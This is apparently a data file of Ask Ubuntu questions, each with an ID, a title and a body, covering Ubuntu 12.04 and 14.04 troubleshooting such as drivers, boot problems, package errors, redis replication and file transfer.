3-0:1.0 : unable to enumerate usb device on port 1
520608	14.04 files slow and freezing	i 'm running a fully updated 14.04 system and i keep getting long delays when performing certain tasks with the `` files '' application . sometimes deleting files will take upwards of a couple minutes to start , with the files grinding to a halt and going grey . the rest of the computer is fine . going to the terminal ans rm'ing ( if i can verb that ) has no delay . sometimes opening a new window will have this same delay as well . i 've tried different desktops ( gnome , kde ) using their respective file browsers and have not had any issues . i do n't think this is an issue with the computer itself , is there something i need to configure with files to get rid of this ? here 's my system : processor : 8x intel ( r ) core ( tm ) i7-4770 cpu @ 3.40ghz memory : 16343mb ( 2822mb used ) os : ubuntu 14.04.1 lts 1tb 7200rpm disk 256gb ssd for os cheers , fratink
520610	ubuntu 14.04 fullscreen problem	i recently installed ubuntu 14.04 on my system ! the problem is that whenever i put a flash player type video full-screen on my second screen , and click away from it on my first screen , it automatically minimises , and it 's getting extremely annoying . it really breaks work-flow , and i ca n't videos shows in full size while working on something else . help , please ! ( using firefox )
520615	boot disk problems	followed the download instructions for making usb bootable for 14.04.01 on borrowed imac as laptop needs a clean boot . copied command line from instructions and pasted into terminal , returns error can not convert multiple files ? this from iso download .
520621	unable to connect to anynetwork	i recently installed ubuntu server 14.04 on a spare box and i am unable to reach any kind of local or public network.however i can ping the ethernet adapter receive replays . any help would be much appreciated
520623	ubuntu 14.04 does n't see kindle fire as as mtp device	when i connect my kindle fire to my ubuntu 14.04 desktop with a micro usb cable , nothing happens . when i check my syslog i get this . tail -f /var/log/syslog sep 5 16:26:22 ubuntu kernel : [ 539971.504102 ] usb 1-8.4 : usb disconnect , device number 18 sep 5 16:26:27 ubuntu kernel : [ 539975.552287 ] usb 1-8.4 : new high-speed usb device number 19 using ehci-pci sep 5 16:26:27 ubuntu kernel : [ 539975.650655 ] usb 1-8.4 : new usb device found , idvendor=1949 , idproduct=000d sep 5 16:26:27 ubuntu kernel : [ 539975.650663 ] usb 1-8.4 : new usb device strings : mfr=1 , product=2 , serialnumber=3 sep 5 16:26:27 ubuntu kernel : [ 539975.650668 ] usb 1-8.4 : product : android sep 5 16:26:27 ubuntu kernel : [ 539975.650672 ] usb 1-8.4 : manufacturer : android sep 5 16:26:27 ubuntu kernel : [ 539975.650676 ] usb 1-8.4 : serialnumber : b05707063456002c sep 5 16:26:27 ubuntu mtp-probe : checking bus 1 , device 19 : `` /sys/devices/pci0000:00/0000:00:1d.7/usb1/1-8/1-8.4 '' sep 5 16:26:27 ubuntu mtp-probe : bus : 1 , device : 19 was not an mtp device
520626	combine multible commands in one run one of them is find	i want in one line a command to use find to get a file name from a txt file , search for it , and play it then after closing the video i need to run a certain script i managed the first part but when it comes to run the script after closing the video it fails this is the command i use to play the video find /videos/ -name $ ( grep -vm 1 ok '~/content ' ) -exec vlc { } \ ; i need to run a script after i close it so i modified it find /videos/ -name $ ( grep -vm 1 ok '~/content ' ) -exec vlc { } \ ; sh '~/close.sh' but it fails with this message it think it 's wrong and bash handle it as one of the options of find so how in one line i can combine a command after find that is not related to the search result of find
520627	screen sometimes keeps cycling between the updated view and the last view	i have installed ubuntu 14.04 in my new computer and the screen sometimes keeps cycling between the updated view and the last view as shown in this video . it also happens outside the terminal and in other circumstances . i 'm pretty sure it is n't a problem with the mouse or the keyboard . it seems to be a problem with the video driver maybe . i 'm using an geforce gtx 770 with latest driver from nvidia but i think this problem happened even before i installed the nvidia driver .
520631	pycharm ca n't find python	when i try to run pycharm it shows this error : error : can not start pycharm no jdk found . please validate either pycharm_jdk , jdk_home or java_home environment variable points to valid jdk installation . i typed python into my terminal and it shows that i have python 3.4 installed , but pycharm cant access it . how can i fix this ?
520633	apt-get install nfs-common does not create an idmapd	i am trying to get nfsv4 client to work with idmapd and i try sudo apt-get install nfs-common unfortunately , this installs the expected files /etc/default/nfs-common , /etc/idmapd.conf etc. , but exits with the following messages : setting up rpcbind ( 0.2.1-2ubuntu2.1 ) ... initctl : unknown job : rpcbind setting up nfs-common ( 1:1.2.8-6ubuntu1.1 ) ... initctl : unknown job : statd initctl : unknown job : gssd initctl : unknown job : idmapd any help is appreciated . thanks , sonny .
520634	giving ownership of the directory to the apache user ?	i have installed wordpress on lamp . as i am new one to ubuntu . so , i used this online tutorial how to install wordpress on ubuntu manually but when i am trying to give ownership of the directory to the apache user it 's not working i am giving the following commands sudo chown admin : www-data /var/www -r sudo chmod g+w /var/www -r '' admin '' is the name which i choose for my wordpress database user . can anyone please guide me through this ?
520637	why the nvidia drivers are never up to date ?	just out of curiosity . maybe there are some technical reasons why the drivers are not up to date . 14.04 64b in additional drivers i have 331 , but at the nvidia website they have 340 . i 'm coming back now to ubuntu , but before , lets say 6 months or 1 year ago was the same . the repositories were always behind .
520646	bash script that opens multiple netcat instances and exits them	i am trying to create a script that opens up multiple gnome-terminals and opens a netcat connection . after a couple seconds i would like the terminals to close . i am at a loss and i believe it ca n't be done , however i figured i 'd ask . this is what i have so far , however after i run it the process id 's are considered incorrect and i believe it 's because gnome-terminal forks the process to bash and i am not capturing that pid . ipaddress= $ 1 port= $ 2 processarray= ( ) echo `` netcat command set to ip : $ ipaddress and port : $ port '' if [ -z `` $ ipaddress '' ] ; then echo `` no ip address entered '' fi if [ -z `` $ port '' ] ; then echo `` no port entered default set to 0 '' $ port=0 fi for i in { 0..9 } ; do gnome-terminal -e `` bash -c \ '' netcat $ ipaddress $ port ; exec bash\ '' '' & processarray+= ( `` $ ! '' ) done sleep 10 ; for i in `` $ { processarray [ @ ] } '' ; do kill `` $ i '' done
520650	changes in 14.04 that could cause redis replication failures ?	folks , i am having challenges enabling redis master-slave replication that i have isolated to be caused ( somehow ) by upgrading from ubuntu 12.04 to ubuntu 14.04 . i had endeavored to setup master-slave replication for several hours yesterday in a specific az on aws . i was slinging data around in 4 separate master-slave configurations ( 14.04 / redis 2.8 master - > 14.04 / redis 2.8 slave ) , ( 14.04 / redis 2.6 master - > 14.04 / redis 2.8 slave ) , ( 14.04 / redis 2.6 master - > 14.04 / redis 2.6 slave ) , and with each of these configurations i would see continual sync failures after a few minutes of running a ~6gb database with 8 slaves and ~500-700 active connections . i finally got things under control when i downgraded back to my earlier ami , ubuntu 12.04 running redis 2.6 . now i no longer see these `` master timeout '' replication issues . this could certainly be cause by a buggy vm or network issues in the az , but i replicated this issue across 4 different master vms and amazon confirmed there were no connectivity issues in my az all day . here 's a sample of the logfile i would see on my slave : [ 2065 ] 04 sep 23:09:37.324 # master time out : no data nor ping received ... [ 2065 ] 04 sep 23:09:37.324 * connecting to master xx.xx.183.237:6379 [ 2065 ] 04 sep 23:09:37.324 * master < - > slave sync started [ 2065 ] 04 sep 23:09:37.325 * non blocking connect for sync fired the event . [ 2065 ] 04 sep 23:09:37.412 * master replied to ping , replication can continue ... [ 2065 ] 04 sep 23:09:38.916 - db 0 : 5655870 keys ( 13216 volatile ) in 8388608 slots ht . [ 2065 ] 04 sep 23:09:38.916 - 13 clients connected ( 0 slaves ) , 8337078232 bytes in use [ 2065 ] 04 sep 23:09:52.208 - db 0 : 5656086 keys ( 13433 volatile ) in 8388608 slots ht . [ 2065 ] 04 sep 23:09:52.208 - 13 clients connected ( 0 slaves ) , 8282736552 bytes in use [ 2065 ] 04 sep 23:10:03.972 - db 0 : 5656218 keys ( 13564 volatile ) in 8388608 slots ht . [ 2065 ] 04 sep 23:10:03.972 - 13 clients connected ( 0 slaves ) , 8369218888 bytes in use [ 2065 ] 04 sep 23:10:05.080 - accepted 127.0.0.1:48594 [ 2065 ] 04 sep 23:10:07.513 * master < - > slave sync : receiving 765625855 bytes from master [ 2065 ] 04 sep 23:10:16.381 - db 0 : 5656436 keys ( 13782 volatile ) in 8388608 slots ht . [ 2065 ] 04 sep 23:10:16.381 - 14 clients connected ( 0 slaves ) , 8206453208 bytes in use [ 2065 ] 04 sep 23:10:17.805 - accepted 127.0.0.1:48627 [ 2065 ] 04 sep 23:10:17.806 - client closed connection [ 2065 ] 04 sep 23:10:25.204 - db 0 : 5656694 keys ( 14041 volatile ) in 8388608 slots ht . [ 2065 ] 04 sep 23:10:25.204 - 14 clients connected ( 0 slaves ) , 8295204696 bytes in use [ 2065 ] 04 sep 23:10:30.416 - db 0 : 5657033 keys ( 14380 volatile ) in 8388608 slots ht . [ 2065 ] 04 sep 23:10:30.416 - 14 clients connected ( 0 slaves ) , 8295477512 bytes in use [ 2065 ] 04 sep 23:10:34.778 * master < - > slave sync : loading db in memory [ 2065 ] 04 sep 23:12:55.817 * master < - > slave sync : finished with success [ 2065 ] 04 sep 23:12:57.046 - db 0 : 5640389 keys ( 33 volatile ) in 12582912 slots ht . [ 2065 ] 04 sep 23:12:57.046 - 17 clients connected ( 0 slaves ) , 6000759720 bytes in use meanwhile , at the same time the master is humming away , totally unaware of any issues : [ 993 ] 04 sep 23:09:30.648 - client closed connection [ 993 ] 04 sep 23:09:30.707 - db 0 : 5641535 keys ( 0 volatile ) in 8388608 slots ht . [ 993 ] 04 sep 23:09:30.707 - 548 clients connected ( 9 slaves ) , 6382226928 bytes in use [ 993 ] 04 sep 23:09:33.355 - client closed connection [ 993 ] 04 sep 23:09:34.426 - accepted xx.xx.160.161:60539 [ 993 ] 04 sep 23:09:35.707 - db 0 : 5641621 keys ( 0 volatile ) in 8388608 slots ht . [ 993 ] 04 sep 23:09:35.707 - 548 clients connected ( 9 slaves ) , 6394589856 bytes in use [ 993 ] 04 sep 23:09:36.083 - client closed connection [ 993 ] 04 sep 23:09:37.326 - client closed connection [ 993 ] 04 sep 23:09:37.411 - accepted xx.xx.132.15:42058 ** [ 993 ] 04 sep 23:09:37.415 * slave ask for synchronization** [ 993 ] 04 sep 23:09:37.416 * waiting for end of bgsave for sync [ 993 ] 04 sep 23:09:38.743 - accepted xx.xx.164.69:36970 [ 993 ] 04 sep 23:09:40.711 - db 0 : 5641679 keys ( 0 volatile ) in 8388608 slots ht . [ 993 ] 04 sep 23:09:40.711 - 548 clients connected ( 9 slaves ) , 6278732976 bytes in use [ 993 ] 04 sep 23:09:42.724 * synchronization with slave succeeded [ 993 ] 04 sep 23:09:43.093 - accepted xx.xx.146.92:41812 [ 993 ] 04 sep 23:09:43.593 - client closed connection [ 993 ] 04 sep 23:09:45.711 - db 0 : 5641753 keys ( 0 volatile ) in 8388608 slots ht . [ 993 ] 04 sep 23:09:45.711 - 548 clients connected ( 9 slaves ) , 6280928336 bytes in use [ 993 ] 04 sep 23:09:46.469 - accepted xx.xx.138.246:36311 [ 993 ] 04 sep 23:09:46.875 - client closed connection can anyone think of reasons why i might see master-slave replication issues on ubuntu 14.04 and not 12.04 ? i have another redis master-slave configuring , not nearly as big ( 1.5 gb , 2 slaves , 600 connections ) that is on ubuntu 14.04 / redis 2.8 with no issues like this . separately from this issue i encountered this ulimits problem a few weeks ago . i was able to resolve it using the steps described , so i do n't think this is an issue for me any longer , but it speaks to the differences encountering running redis on ubuntu 14.04 vs ubuntu 12.04 .
520651	can i set up a different password to login with ?	i just switched from windows , and there i had the ability to set up multiple login options- you can enter your account password , or login with a pin number/ other password , which i liked because i can let my friends use my computer without having to set up multiple accounts , or give away my administrating password i use for everything . is there a way to do the same thing on ubuntu- create different ways to login ?
520659	no ppd file while trying to install canon imageclass mf8380 cdw	i am trying to install driver for canon imageclass mf8380 cdw usint these instructions : installing canon color imageclass mf8380cdw drivers in ubuntu 12.10 everything goes fine until i have to provide a ppd file . the directory /etc/cups/ppd is empty and i am unable to find the ppd file anywhere . is there are an alternate way of installing this driver or does anyone know where i can find the ppd file ?
520663	gnome ubuntu workspace switcher	the workspace switcher/ viewer only shows one of my screens not the other one . how do i make it show both ?
520664	resize boot partition / defragment boot partition	how can i resize boot partition , when i try to do it as we do for non-boot partition , it wo't lem me do it . i want to install windows 7 , but in bios , it shows i have zero mb as free space . so , i think i have to resize boot partition or create new partition . urgent help needed please .
520665	switching from ubuntu desktop to server 14.04	ok , this ubuntu disto was originally installed as ubuntu server 12.04 . along the line , someone thought it was a good idea to install ubuntu-desktop . it has since been upgraded to 14.04 lts and remains ubuntu desktop . i do n't want to have any of the desktop packages any longer and would like to revert it back to just ubuntu server . i have searched high and low , but i ca n't seem to find anything definitive for this process for 14.04lts . i have found removing the ubuntu-desktop package , but as i 've learned this does n't even remotely remove everything related to the desktop version . unity , gnome , firefox , etc etc . could someone please fill me in on the proper way to completely remove all of the desktop environment and all of its associated packages for 14.04 ? thank you
520666	lenovo hdd airbag protection	i have a lenovo t430 laptop . when i had windows installed , it had this airbag protection feature which allows the disk to park when movement is detected . i have ubuntu 14.04 . is there any application , like the one mentioned above , that will do the same for ubuntu ?
520667	can not make sublime text 3 work on ubuntu 14.04	downloaded different versions and from different places , still can not get it work on 14.04 . i could get it to run successfully on os x and ubuntu 12.04. drwxrwxrwx 5 root root 4096 sep 5 17:14 ./ drwxr-xr-x 10 root root 4096 aug 19 17:39 ../ drwxr-xr-x 3 root root 4096 aug 26 20:51 opt/ drwxrwxr-x 4 achippa achippa 4096 aug 26 20:50 sublime_text_3/ -rw-r -- r -- 1 achippa achippa 7557246 sep 5 17:14 sublime_text_3_build_3065_x64.tar.bz2 -rw-r -- r -- 1 achippa achippa 6369566 sep 5 16:53 sublime-text_build-3065_i386.deb drwxr-xr-x 4 root root 4096 aug 26 20:51 usr/ achippa @ ubuntu : /usr/local/src $ cd sublime_text_3/ achippa @ ubuntu : /usr/local/src/sublime_text_3 $ ./sublime_text -bash : ./sublime_text : can not execute binary file : exec format error achippa @ ubuntu : /usr/local/src/sublime_text_3 $ /usr/local/bin/subl unable to load libgdk-x11-2.0.so unable to load gdk_cairo_create from libgdk-x11-2.0.so unable to load gdk_cursor_new_for_display from libgdk-x11-2.0.so unable to load gdk_cursor_unref from libgdk-x11-2.0.so ... with i386.deb i see a bunch of unable to load ... errors . with x64_tar.bz2 , i see an exec format error . which is the right file to download for 64-bit ubuntu 14.04 .
520669	ca n't refresh packages in update manager	in update manager i try to update the list of packages and i get a window titled synaptic with the following output failed to fetch http : //security.ubuntu.com/ubuntu/dists/raring-security/main/binary-amd64/packages 404 not found [ ip : 2001:67c:1360:8c01 : :18 80 ] ( many more lines like this ) some index files failed to download . they have been ignored , or old ones used instead . how do i fix this ? please answer with complete step by step instructions . thanks .
520671	changing default dash view - 12.04 lts	i would like to know if it is possible to replace the default display of the dash from historical ( last soft and files used ) to list of installed software ( second icon at the bottom of the dash screen ) . thank you
520672	ubuntu 14.04 stuck on login	i am having an issue with 14.04 . it was installed a couple days ago , however after the first cold restart , the issue arises . i can get to the grub , then to login , but then i am stuck with the desktop background only . this is similar to other threads , but the difference is that i can not access terminal at all . pressing ctrl + alt + f ( ? ) only yields a bright pink or dark purple screen with no text . thank you for the help !
520673	`` php-clamav : depends on : phpapi-20090626+lfs but it is not going to be installed ''	i want to install `` php-clamav '' . but ... msy @ msy-inspiron-one-2020 : ~ $ sudo apt-get install -f php-clamav 正在读取软件包列表 ... 完成 正在分析软件包的依赖关系树 正在读取状态信息 ... 完成 有一些软件包无法被安装。如果您用的是 unstable 发行版，这也许是 因为系统无法达到您要求的状态造成的。该版本中可能会有一些您需要的软件 包尚未被创建或是它们已被从新到 ( incoming ) 目录移出。 下列信息可能会对解决问题有所帮助： 下列软件包有未满足的依赖关系： php-clamav : 依赖 : phpapi-20090626+lfs 但无法安装它 e : 无法修正错误，因为您要求某些软件包保持现状，就是它们破坏了软件包间的依赖关系。 translation : msy @ msy-inspiron-one-2020 : ~ $ sudo apt-get install -f php-clamav reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . if you are using the unstable distribution , this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : php-clamav : depends on : phpapi-20090626+lfs but it is not going to be installed e : unable to correct problems , you have held broken packages . some packages that you require to maintain the status quo have broken the dependencies between packages . i installed libapache2-mod-php5 , libapache2-mod-php5filter , php5-cgi and php5-cli , but i still ca n't install php-clamav . what 's wrong ?
520674	how do i fix black screen when switching to tty ?	when i use ctr + alt + f1 to use the command line from the login screen ( or anywhere for that matter ) , i get a black screen and can not get anything to appear on-screen other than that i am able to switch back to gui using ctr-alt-f7 . i performed the steps described here why does switching to the tty give me a blank screen ? but it did n't seem to fix anything for me , but now on boot-up i get onscreen text that says `` error : no video mode activated '' . running ubuntu 14.04 64-bit with i5-4690k processor , graphics card is evga nvidia geforce gtx 750 . note that i do not have the nvidia driver installed , which incidentally is why i was trying to use the tty in the first place ( i downloaded it from the nvidia site and was attempting to install it manually ) . just fyi i 'm quite new to unix and linux , and thanks in advance for your time !
520676	right mouse click not working in latest firefox 14.04	this is since the recent upgrade to 14.04 and only with firefox , chrome works ok but less useful as it does not work with flash . i see this has happened in previous ubuntu versions .
520677	ubuntu wubi install is freezing / stalling / hanging on iso download	i have downloaded the 12.04 located wubi.exe and the 14.04.1 located wubi.exe . i am getting the same behavior from both . once you start either exe they give you a dialog and then after ok begin downloading an iso file . this works for a while , and then stalls / hangs / freezes . the progress bar remains the same and the `` approximate time remaining '' remains the same . however , the installer is still alive . it will repond with an `` are you sure ? '' type message if you click on [ cancel ] . one question - is anyone else getting this behavior ? second question - can i do a wubi install with a manual download of the big file that is required and which wubi seems to hang on ? edit : got a great answer to the question from eliah kagan below . however , it appears that a bug in the software/file formats since ubuntu 12.10 prevent the use of this technique as the software incorrectly processes the md5 checksums . see this bug : metalink md5sum check fails due to change in format
520680	how to add command-lines to pygtk application to run after executing .deb file ?	i 've just made a small application written in pygtk using quickly . inside the application there are some functions which needs some other packages to be installed . for example i need `` mencoder '' to burn subtitles on video files . how can i add some commands like `` sudo apt-get install mencoder '' to my application , so when the user execute the .deb file , mencoder 's installing process will be done automatically ?
520681	messed with dns , now does not connect to internet	so i was trying to fix this reverse dns issue : $ dig hostname.domain.com 1.2.3.4 # example $ dig -x 1.2.3.4 otherhostname.otherdomain.com i was blindly following online instructions to fix it : in , /etc/hosts , i changed the first line 127.0.0.1 localhost to 127.0.0.1 hostname.domain.com localhost.localdomain localhost then i did : sudo /sbin/dhclient -r i believe by then i realized i no longer had internet connection , even though i was still connected to wifi . i reverted the edit to /etc/hosts , without effect . ( i am posting from another computer , so first i would like to fix the internet connection on original computer ) . any ideas ? thanks edit : @ alaa ali 's initial proposal did n't work for me , but he told me to restart my machine , which worked .
520682	ubuntu touch in nexus and gcc	i install ubuntu touch into my nexus : why i can not run a simple hello world application compiled with gcc directly using the terminal console . i get permission denied . but i am able to run thourght a ssh terminal . wierd ... . thanks in advanced ... ..
520688	need help mounting errors i wan na use my cd drive	i have a question on mounting and no matter how hard i try i can not get it and i am getting very frustrated all i want is to be able to use my cd-rom thatâs all . so let me give you some info about my computer i used to have ubuntu 12 and upgraded to ubuntu 14 and did the update now my system is up to date i can not get the cdrom to work . so in my / folder i have a folder called cdrom . in my root folder i have a folder called media and in that i have a folder called cdrom and in my /dev folder i have a file called cdrom and i dont know if /etc/fstab document has anything to do with this but i see people posting the contents of their fstab document which is in etc to try to figure out what is going on so i dont know if that helps or not but i will put the contents of that document here # /etc/fstab : static file system information . # # use 'blkid ' to print the universally unique identifier for a # device ; this may be used with uuid= as a more robust way to name devices # that works even if disks are added and removed . see fstab ( 5 ) . # # < file system > < mount point > < type > < options > < dump > < pass > # / was on /dev/sda1 during installation uuid=1a2a862b-d1d1-4d98-b172-62ad4f3bb826 / ext4 errors=remount- ro 0 1 # swap was on /dev/sda5 during installation uuid=b6c59812-f866-4171-9025-334af75dacd8 none swap sw 0 0 that is what my /etc/fstab looks like also i dont know if this helps but on a website this command is supposed to tell you if your cdrom what type it is or something the command was lsblk and this is the result of that command ... .. name maj : min rm size ro type mountpoint sda 8:0 0 141.1g 0 disk -- sda1 8:1 0 146.6g 0 part / -- sda2 8:2 0 1k 0 part -- sda5 8:5 0 2.5g 0 part [ swap ] sr0 11:0 1 276.4m 0 rom thats pretty much all the info i have my cd drive is actually a dvd rw drive my computer is an old e-machines still runs great on linux all i need is to get my darn cd-drive to work i hope i have supplied enough info to get this figured out also i know about the mount /dev/cdrom /mnt/cdrom but this dont work i get an error and theres that other one with 9660 or sonething that dont work either i dont know what to do please help me thank you
520689	how to fix authentication password , when password is rejected ?	when i try to upgrade , i am prompted for authentication password . i enter the password i have set , but i receive a message saying it is incorrect . the same thing happens when i am prompted to `` unlock '' for document editing , etc . the password is rejected . i re-set my password in the root system , but continue to have the same problem .
520691	lost all files during reinstall/downgrade	this is probably a classic colossal blunder . i have an old dell laptop . i was running ubuntu 12.04 . i got a notification telling me that new version , 14.something was available . when i started to download , or install it , i got a warning saying my graphics might not support 14 . i decided to try ot anyway.it was quickly apparent that my system could n't handle 14 , so i decided to downgrade to 12.04 . during the installation , i saw a warning saying that the installation would use the entire disk ( it had been partitoned , ) and i was asked something about saving old files . call it add , haste , stupidity , whatever , but with the reinstallation i lost every bit of my data . can it be recovered ? if this question has been asked , and answered previously , i apologize . i did search , and this question seemed to be closest to mine , but not exactly . i may go ahead and try the solution that was offered in the linked discussion while waiting for a response to mine . thank you . lost files on upgrade to 14.04
520696	ubuntu 12.04 shuts down due to hdmi ?	i am running ubuntu 12.04 and it has started to shut down randomly . i check my syslog on noticed this : kernel : [ 132227.799570 ] hdmi : audio coding type 0 not expected kernel : kernel logging ( proc ) stopped . rsyslogd : [ origin software= '' rsyslogd '' swversion= '' 5.8.6 '' x-pid= '' 772 '' x-info= '' http : //www.rsyslog.com '' ] exiting on s this is clearly when ubuntu crashed as far as i can tell . does this mean my hdmi driver caused the crash ? where do i go with this info ?
520699	ca n't boot windows 7 after ubuntu 14 install	i decided to try ubuntu for the first time and thought i would install it on my usb backup drive . it would n't let me partition my win7 drive . after what appeared to be a successful installation , i restarted and got a 'no such device ' error . i googled the problem and every time i try to get grub to the normal mode it says missing ' ) ' token . what does this mean ? i really need to get back into my windows 7 as this is my only computer . i dont have a recovery disk because i just bought this pc from someone else . thanks for reading . i typed this up with my phone .
520702	transfer files from windows to linux over the network ?	what is the easiest way for me to transfer files from a windows machine to a linux machine ? this would be to back up user data for a clean install . assuming that they 're on the same network . the solutions so far : http : //winscp.net/eng/index.php https : //cyberduck.io/ as per : http : //superuser.com/a/315569/55747 just looking for alternatives and/or confirmation of these approaches . i 'm somewhat familiar with scp from the command line , but a gui would be nice .
520703	should i be worried about these scan results form rkhunter ?	should i be worried about these scan results form rkhunter ? [ 22:09:40 ] info : starting test name 'passwd_changes' [ 22:09:40 ] checking for passwd file changes [ warning ] [ 22:09:40 ] warning : user 'usermetrics ' has been added to the passwd file . [ 22:09:40 ] warning : user 'clickpkg ' has been added to the passwd file . [ 22:09:40 ] [ 22:09:40 ] info : starting test name 'group_changes' [ 22:09:40 ] checking for group file changes [ warning ] [ 22:09:40 ] warning : group 'usermetrics ' has been added to the group file . [ 22:09:40 ] warning : group 'clickpkg ' has been added to the group file . [ 22:09:40 ] checking root account shell history files [ none found ] i saw a usermetrics line and clickpkg line at the end of my /etc/passwd file as rkhunter reports .
520706	how do i use the `` qml extension library + tabbed ui '' option in the ubuntu sdk ?	is there a tutorial for using the extension library project type ? i have n't touched c++ in a long time , and i 'm completely new to qt . i 'm not looking for anything complex , just something like `` here 's where you put your code , and here 's how you call that code '' .
520710	apache office installation	why libre office need to be uninstalled while installing apache office . i am finding libre office too slow when hd images are loaded for project work , the pages moves in a very slow motion and if give command it takes 2-3 sec to execute it .
520711	ubuntu upgrade stuck with 12.10	i am running no lsb modules are available . distributor id : ubuntu description : ubuntu 12.10 release : 12.10 codename : quantal the above version of ubuntu and now am stuck because , even after i point to archive repos for quantal , the software manager always ends ups not finding even a simple s/w like gimp . 'course i realize the eol thing that infected 12.10 i have 2 q 's : < > is there any distro out there , which is stable , and will ct to have support for a long time and does not suffer from eol hell . < > what do i do now that i am stuck , other than wipe dry and re-install .
520712	xbacklight stopped working after updating video drivers	as the title says , xbacklgiht use to work prior to updating video drivers . i can no longer change the brightness on my screen . i 'm on lubuntu 14.04 on a acer 720 chromebook which has intel integrated graphics . i found an article that explains how to solve the issue but when i ran ls /sys/class/backlight/ , it did n't output anything and i do n't know if that could be related to the issue . thanks . edit : here 's the link http : //itsfoss.com/fix-brightness-ubuntu-1310/ edit 2 : after doing some research , i have tried editing the grub file with no luck . i tried changing to video.use_native_backlight=1 , acpi_osi= , acpi_backlight=video , and acpi_backlight=vendor i also tried re installing xbacklight but no luck there either . i really do n't know what else to do besides re installing the os but i really do n't want to since my semester started and it was a pain to set it up
520713	how do i password protect a single file	how do i password protect a single file so that an authorised windows user can open it on his machine ? i want to send a file to a friend who is ignorant of all things linux . while none of the information is compromising , it is private .
520714	can not update or install new packages kubuntu 14.04.1 after upgrade from 12.04.5	i upgraded my 12.04.5 kubuntu installation to kubuntu 14.04.1 , but during the installation of packages , two things went wrong . first was a long-named deb package that had `` all '' at the end of it , which gave me an error along the lines of `` is not in working condition '' . the second was tzdata , which was to be upgraded from 12.04 version to 14.04 version , but the error first says the same thing as the previous one , and then it says the reason why it can not update it was because it was already installed . i tried to send a bug report using the built in bug report system , but it did nothing . after finishing the upgrade , i noticed that i can not update or install any packages at all , and it is because tzdata still needs to be upgraded , along with libgv5 . i tried all manner of things : apt-get upgrade apt-get -f upgrade apt-get dist-upgrade apt-get -f dist-upgrade but it all fails . using the ubuntu software center ( i have it for a reason ) , i tried to see if there were any problems it could try and fix . it errored out , i had to kill its window with ctrl+alt+esc . now my libreoffice is going nuts saying that it ca n't be launched by something without authority or some other crap . here is what i get in console whenever i try to upgrade anything : root @ km-desktop : /usr/share/kde4/apps/lightdm-kde-greeter/themes # apt-get upgrade reading package lists ... done building dependency tree reading state information ... done calculating upgrade ... done the following packages were automatically installed and are no longer required : gcc-4.6-base : i386 gnome-games-data gnome-games-extra-data icedtea-netx icedtea-netx-common libalgorithm-c3-perl libapache-ruby1.8 libavdevice-extra-53 libbabl-0.0-0 libblas3gf libcdt4 libcelt0-0 libcgraph5 libclass-base-perl libclass-c3-perl libclass-c3-xs-perl libclass-data-inheritable-perl libconfig++8 libdb5.1 : i386 libdb5.1-java-jni libdrm-nouveau1a : i386 libgail-3-0 libgconf2-4 libgd2-xpm : i386 libgegl-0.0-0 libgphoto2-2 : i386 libgphoto2-port0 : i386 libgraph4 libgvpr1 libjpeg62 libkpathsea5 liblapack3gf liblcms1 : i386 libllvm3.0 : i386 libmagickcore4 libmagickwand4 libmjpegtools-1.9 libmng1 : i386 libmro-compat-perl libopencv-calib3d2.3 libopencv-core2.3 libopencv-features2d2.3 libopencv-flann2.3 libopencv-highgui2.3 libopencv-imgproc2.3 libopencv-objdetect2.3 libparams-util-perl libpython3.2 libruby1.8 libsox1b libt1-5 libtasn1-3 : i386 libtcl8.5 libtiff4 : i386 libtk8.5 libusb-0.1-4 : i386 libxml-writer-perl linux-headers-3.2.0-65 linux-headers-3.2.0-65-generic linux-headers-3.2.0-67 linux-headers-3.2.0-67-generic python-central python-gconf python-gst0.10 python-launchpad-integration python-libxml2 python-pygoocanvas python3.2 python3.2-minimal syslinux-themes-debian-squeeze tcl8.5 tk8.5 ttf-umefont wine-gecko1.4 wine-gecko1.4 : i386 wine1.4 wine1.4-amd64 wine1.4-i386 : i386 use 'apt-get autoremove ' to remove them . the following packages will be upgraded : grub-customizer tzdata 2 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . need to get 0 b/894 kb of archives . after this operation , 1,148 kb of additional disk space will be used . do you want to continue ? [ y/n ] preconfiguring packages ... ( reading database ... 443743 files and directories currently installed . ) preparing to unpack ... /tzdata_2014e-0ubuntu0.14.04_all.deb ... unpacking tzdata ( 2014e-0ubuntu0.14.04 ) over ( 2014e-0ubuntu0.12.04 ) ... dpkg : error processing archive /var/cache/apt/archives/tzdata_2014e-0ubuntu0.14.04_all.deb ( -- unpack ) : unable to make backup link of `./usr/share/zoneinfo/roc ' before installing new version : operation not permitted dpkg-deb : error : subprocess paste was killed by signal ( broken pipe ) errors were encountered while processing : /var/cache/apt/archives/tzdata_2014e-0ubuntu0.14.04_all.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 ) i am kinda pissed about this since i actually want to get upgraded to something a bit newer than 12.04 ( plus some cool stuff came with 14.04 ) , but at the same time this is what i somewhat expected to happen on an upgrade . if this is just some kind of anomaly from my specific setup , then i may as well just wait until 16.04 when 14.04 gets its kinks worked out . at least now i know not to upgrade my servers just yet . oops , i just realized i described an entire problem here but i did n't so much as actually ask the golden question : wtf do i do to fix this ? if you need me to post details about my setup , run commands and post output , etc. , just ask me what you specifically want , and i will oblige .
520717	'error unrecognized service ' when trying to test cluster	i am trying to follow the instructions on cloudera 's website here [ 1 ] to set up a test cluster in pseudo distributed mode . but i am unable to even start any services after formatting the namenode $ for x in `cd /etc/init.d ; ls hadoop-hdfs-*` ; do sudo service $ x start ; done error unrecognized service
